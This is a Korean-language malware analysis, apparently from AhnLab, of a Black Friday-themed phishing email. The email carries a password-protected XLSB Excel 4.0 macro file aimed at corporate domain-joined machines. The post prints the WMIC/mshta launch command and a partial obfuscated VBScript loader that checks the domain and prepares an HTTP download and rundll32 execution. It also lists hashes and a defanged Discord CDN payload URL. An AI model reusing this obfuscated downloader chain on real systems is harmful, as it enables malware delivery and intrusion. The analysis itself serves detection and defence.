블랙프라이데이 시즌을 노린 기업 타겟 악성 엑셀 문서 유포

블랙프라이데이 시즌을 노린 악성 엑셀 문서가 기업을 대상으로 유포되고 있다. 오늘 11월 25일 확인된 이메일은 국내 모 기업에서 접수되었다. 이메일은 엑셀 문서를 첨부 파일로 포함하고 있었다. 엑셀 문서는 XLSB 엑셀 바이너리 포맷의 Excel 4.0 Macro (XLM) 매크로시트를 포함한 파일로서, 실행 대상 시스템의 도메인 컨트롤러 여부를 확인하여 추가 악성 기능이 실행한다.

첨부된 엑셀 문서는 파일명이 ‘promo details-[숫자].xlsb’ 형식이고 XLSB 파일 포맷인 것이 특징이다. XLSB은 엑셀 바이너리 파일 포맷으로서, 기존의 XLS 또는 XLSX 파일과는 다소 다른 파일 구조를 보인다. XLSX가 스트링 기반의 XML 파일이라면 (아래 그림 참고), XLSB는 아래와 같이 Hex 바이너리로 되어있다. 따라서 안티바이러스 제품이 파일 특정 포인트 진단하거나 분석가가 코드를 해석하는데 좀 더 어려움이 있다. XLSB 파일 포맷 악성 파일이 이번에 처음 발견된 것은 아니다. 그러나 지금까지는 XLS, XLSX 파일 포맷이 이메일을 통해 좀 더 많이 유포되었기 때문에 이후 동향에 주목할 필요가 있다.

XLSB 파일 포맷
XLSB 파일에서 매크로시트를 구성하는 Binary 파일
XLSX 파일에서 매크로시트를 구성하는 XML 파일

첨부된 엑셀 문서를 실행하면 다음과 같은 화면이 보인다. 매크로 실행을 허용하고 이미지를 클릭하면 악성 기능이 실행된다. 이미지를 클릭해야 악성 기능이 실행되는 것은 자동 분석 시스템 등을 회피하기 위한 것으로 보인다. 또한 공격자는 파일 분석을 어렵게 하기 위해 엑셀 문서를 ‘보호’ 하였다. 유효한 암호가 있어야 파일 내용 편집 및 숨겨진 매크로시트를 확인할 수 있기 때문에 악성코드 제작 방식이 이전보다 더 디테일해진 것으로 볼 수 있다.

이미지 클릭시 실행되는 악성 기능은 다음과 같다. ProgramData 경로에 악성 파일을 생성하고 이를 WMIC를 통해 실행한다. 생성되는 악성 파일은 VBScript 파일이지만 RTF 파일 확장자로 위장하였다. mshta.exe 프로세스를 이용하여 파일이 실행된다.

Command line: wmic process call create "mshta C:\ProgramData\cbfyx.rtf"

실행되는 VBScript 는 다음과 같은 코드(일부)를 포함하고 있다. 주요 기능은 다음과 같다.

  • Wscript.shell 을 이용하여 시스템의 %USERDOMAIN%, %LOGONSERVER% 환경변수 (Environment Variable) 확인 – 도메인 컨트롤러 연결 확인 목적
  • 도메인 컨트롤러 연결이 확인되지 않을 경우 이후 기능은 실행되지 않음
  • 도메인 컨트롤러 연결이 확인된 경우 hxxps://cdn.discordapp.com/<생략> 에 접속하여 악성 DLL 파일 다운로드
  • 다운로드 된 악성 DLL 파일은 ProgramData 경로에 nianigger.bin 파일명으로 생성됨
  • Rundll32.exe 프로세스로 악성 DLL 파일 실행 C:\ProgramData\nianigger.bin DllRegisterServer
<script type="text/vbscript" LANGUAGE="VBScript" >
G_Q_w_i_Y_t_S_V_Y_W_n_K_s_i_F = "ru" & "" & Chr(110+1-1) & "dll" & "32." & "ex" & Chr(101+1-1) & Chr(32+1-1) & Chr(67+1-1) & ":\\" & Chr(80+1-1) & "ro" & Chr(103+1-1) & "ra" & "mDa" & "" & "ta\" & Chr(110+1-1) & "ian" & Chr(105+1-1) & "gge" & Chr(114+1-1) & ".bi" & "n D" & Chr(108+1-1) & "lR" & "egi" & "ste" & "rS" & "er" & "ve" & "" & Chr(114+1-1)
Set Q_o_b_k_v_e_J_u_V_s = CreateObject("" & "MSX" & "" & Chr(77+1-1) & "L2." & "" & "Se" & "rve" & "rXM" & Chr(76+1-1) & "HT" & "TP." & "" & "" & "" & Chr(54+1-1) & Chr(46+1-1) & Chr(48+1-1))

H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k = Chr(87+1-1) & "" & "scr" & Chr(105+1-1) & "" & "" & "" & "pt." & "Sh" & Chr(101+1-1) & "" & Chr(108+1-1) & "" & Chr(108+1-1)
Set W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z = CreateObject(H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k)
w_g_x_q_b_O_S_y_G_g_w_c = LCase(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.expandenvironmentstrings("%USERDOMAIN%"))
e_K_l_a_I_l_c_E_t =LCase(Replace(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.expandenvironmentstrings("%LOGONSERVER%"), CHR(92+1-1+1-1), ""))
Set q_h_H_U_O_o_S_q = CreateObject("" & "" & Chr(83+1-1) & "" & "cri" & "pt" & "ing" & Chr(46+1-1) & "" & Chr(70+1-1) & "ile" & Chr(83+1-1) & Chr(121+1-1) & "" & "ste" & "mOb" & "" & "je" & Chr(99+1-1) & Chr(116+1-1))
    
</script>

즉, 이번에 확인된 이메일과 악성 엑셀 문서는 기업을 대상으로 유포와 공격을 시도하는 악성코드이다. 블랙프라이데이 시즌 뿐만 아니라 앞으로 XLSB 파일을 이용한 유사 공격 형태가 더 빈번하게 있을 것으로 예상된다.

[파일 진단]
Downloader/XLS.Generic
Trojan/Win.FJX

[행위진단]
Execution/MDP.Behavior.M3819

[IOC]
9f27881dd96c57de0495bf609b954af5 (EML)
33411e3b8028fe4b8f9786b440d0b098 (EML)
f2c941b14d81c9b6b7a7aa6b98f91ce9 (XLSB)
e73d286a4915a3f62516a701f5ae9467 (XLSB)
ff330965e4d39788c99b9b9c6128983a (DLL)
hxxps://cdn[.]discordapp[.]com/attachments/912720368844824620/913069652077326346/KftJXyrZQyellowfacebrownietacohead.ogg

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

0 0 votes
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments